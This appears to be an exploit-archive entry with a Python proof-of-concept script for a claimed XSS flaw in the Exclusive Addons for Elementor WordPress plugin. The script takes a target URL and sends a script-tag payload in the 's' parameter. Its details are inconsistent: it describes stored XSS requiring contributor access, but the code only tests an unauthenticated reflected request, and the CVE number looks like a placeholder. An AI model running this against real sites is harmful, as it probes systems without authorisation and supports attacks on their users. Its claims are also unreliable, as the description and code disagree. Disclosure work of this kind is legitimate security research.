# Exploit Title: Exclusive Addons for Elementor ≤ 2.6.9 - Authenticated Stored Cross-Site Scripting (XSS)
# Original Author: Wordfence Security Team
# Exploit Author: Al Baradi Joy
# Exploit Date: March 13, 2024
# Vendor Homepage: https://exclusiveaddons.com/
# Software Link: https://wordpress.org/plugins/exclusive-addons-for-elementor/
# Version: Up to and including 2.6.9
# Tested Versions: 2.6.9
# CVE ID: CVE-2024-1234
# Vulnerability Type: Stored Cross-Site Scripting (XSS)
# Description:
The Exclusive Addons for Exclusive Addons for Elementor for WordPress, in versions up to
and including 2.6.9, is vulnerable to stored cross-site scripting (XSS) via
the 's' parameter. Due to improper input sanitization and output escaping,
an attacker with contributor-level permissions or higher can inject
arbitrary JavaScript that executes when a user views the affected page.
# Proof of Concept: Yes
# Categories: Web Application, Cross-Site Scripting (XSS), WordPress Plugin
# CVSS Score: 6.5 (Medium)
# CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
# Notes:
To exploit this vulnerability, an attacker needs an authenticated user role
with permission to edit posts. Injecting malicious JavaScript can lead to
session hijacking, redirections, and other client-side attacks.
## Exploit Code:
```python
import requests
from urllib.parse import urlparse
# Banner
def display_banner():
exploit_title = "CVE-2024-1234: Exclusive Addons for Elementor Plugin
Stored XSS"
print("="*50)
print(f"Exploit Title: {exploit_title}")
print("Made By Al Baradi Joy")
print("="*50)
# Function to validate URL
def validate_url(url):
# Check if the URL is valid and well-formed
parsed_url = urlparse(url)
if not parsed_url.scheme in ["http", "https"]:
print("Error: Invalid URL. Please ensure the URL starts with http://
or https://")
return False
return True
# Function to exploit XSS vulnerability
def exploit_xss(target_url):
# The XSS payload to inject
payload = "<script>alert('XSS Exploit')</script>"
# The parameters to be passed (in this case, we are exploiting the 's'
parameter)
params = {
's': payload
}
# Send a GET request to the vulnerable URL with the payload
try:
print(f"Sending exploit to: {target_url}")
response = requests.get(target_url, params=params, timeout=10)
# Check if the status code is OK and if the payload is reflected in
the response
if response.status_code == 200 and payload in response.text:
print(f"XSS exploit successful! Payload: {payload}")
elif response.status_code != 200:
print(f"Error: Received non-OK status code
{response.status_code}")
else:
print("Exploit failed or no XSS reflected.")
except requests.exceptions.RequestException as e:
print(f"Error: Request failed - {e}")
except Exception as e:
print(f"Unexpected error: {e}")
if __name__ == "__main__":
# Display banner
display_banner()
# Ask the user for the target URL
target_url = input("Enter the target URL: ").strip()
# Validate the provided URL
if validate_url(target_url):
# Call the exploit function if URL is valid
exploit_xss(target_url)
